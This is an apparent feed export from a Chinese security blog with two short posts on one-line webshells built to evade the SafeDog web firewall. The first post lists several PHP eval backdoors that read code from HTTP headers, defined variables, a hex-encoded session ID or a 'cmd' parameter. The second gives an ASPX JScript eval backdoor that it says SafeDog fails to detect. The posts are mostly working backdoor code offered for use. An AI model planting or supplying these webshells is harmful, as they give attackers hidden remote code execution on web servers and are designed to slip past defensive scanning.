过狗一句话 – ChaBug安全 / 一个分享知识、结识伙伴、资源共享的博客 Fri, 25 Jan 2019 14:35:10 +0000 zh-CN hourly 1 https://wordpress.org/?v=5.5.5 PHP利用Apache、Nginx的特性实现免杀Webshell /tools/646.html Fri, 25 Jan 2019 14:33:27 +0000 /?p=646 get_defined_vars()getallheaders()是两个特性函数,我们可以通过这两个函数来构造我们的webshell前几天看到的,一直忘记写,填坑。 <!–more–>

环境 函数 用法
nginx get_defined_vars() 返回由所有已定义变量所组成的数组
apache getallheaders() 获取全部 HTTP 请求头信息

apache环境

<?php
eval(next(getallheaders())); 
?>

apache和nginx环境通用

<?php
eval(implode(reset(get_defined_vars())));
?>

另外一种通过执行伪造的sessionid值,进行任意代码执行。

<?php
eval(hex2bin(session_id(session_start())));
?>

706870696e666f28293b这个是phpinfo();的hex编码。

shell加密码

<?php eval(get_defined_vars()['_GET']['cmd']);?>
]]> aspx 过狗一句话 /tools/374.html Wed, 07 Mar 2018 17:41:03 +0000 /?p=278 https://exp10it.cn/2018/03/07/aspx-bypass-safedog.html

原理未知

安全狗竟然查杀不了这么 nb 的 code

<%@ Page Language="Jscript"%>
<%eval(/*s*/ Request.Item["pass"],"unsafe");%>
]]>